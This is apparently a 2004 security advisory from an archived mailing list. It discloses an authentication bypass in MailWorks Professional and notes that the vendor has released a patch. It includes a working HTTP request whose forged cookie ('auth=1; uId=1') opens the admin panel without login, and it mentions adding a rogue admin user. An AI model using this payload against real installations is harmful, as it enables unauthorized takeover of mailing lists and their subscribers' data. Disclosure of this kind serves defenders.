Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email email@example.com
MailWorks Professional - Authentication Bypass
Date: Thu Sep 02 2004 - 02:42:31 CDT
"Its all about the Bling, B^!%s and Fame!"
MailWorks Professional All versions
Authentication bypass via cookie control
(C) Paul Craig - Pimp Industries 2004
MailWorks Professional is a mailing list management application, developed
by sitecubed. It provides an easy way for e-zines or newsletters to manage
large amounts of contacts and distribute newsletters among them. It’s
reasonably popular with many websites and has been around for a while.
C really is for cookie and in this case, MailWorks Pro has a rather
trivial session check that is easily bypassed within a cookie. The exploit
allows an attacker to have full control over the administration section,
without the need to authenticate and allowing the attacker to spoof the
admin user functions.
An example HTTP packet is below
GET /mwadmin/index.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/msword, application/x-shockw
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR
Cookie: auth=1; uId=1
The cookie contains the exploit, auth=1 (to signify that you have logged
in) and uId= the id of the user you want to be, by default uId=1 is user
This request will show the index page for user “Admin”, instead of the
usual “Please Login” page.
This can be further exploited by sending a HTTP post to add a new user
with full admin rights, from there the attacker can login as a legitimate
Sitecubed was contacted early this morning; they responded very quickly
and have released a patch for all customers that is available on their
Well done Sitecubed for being prompt!
Pimp Industries is a privately owned security research company. If you
would like to contact Pimp Industries to discuss any nature of business,
please email us at headpimppimp-industries.com.
Head Pimp, Security Researcher
"Move Fast, Think faster"